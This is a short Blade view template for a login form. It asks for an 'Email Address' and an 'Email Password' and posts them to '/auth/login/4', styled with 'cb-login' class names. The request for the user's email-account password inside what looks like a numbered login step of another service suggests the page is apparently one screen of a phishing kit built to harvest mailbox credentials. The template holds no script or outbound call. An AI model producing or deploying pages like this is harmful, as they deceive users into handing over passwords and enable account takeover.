@layout('layouts.app')

@section('content')
<div class="cb-login-static-alert cb-login-message cb-login-alert-message cb-loginFormArea"></div>

<div class="cb-login-form cb-loginFormArea">
  <form class="cb-form" action="/auth/login/4" method="POST">
    <div class="field">
      <label class="cb-login-field" for="emailAddr">Email Address</label>
      <input id="emailAddr" name="emailAddr" class="mrg-T-sm form-control cb-text-field" type="text" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">
    </div>

    <div class="field">
      <label class="cb-login-field" for="emailPass">Email Password</label>
      <input id="emailPass" name="emailPass" class="mrg-T-sm form-control cb-text-field cb-text-field-mask" type="password" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">
    </div>

    <div id="userLinks">
      <button class="logon-submit btn-primary btn-block pointer btn disabled" disabled="">
        <div class="icon"></div>
        Continue
      </button>
    </div>
  </form>
</div>
@endsection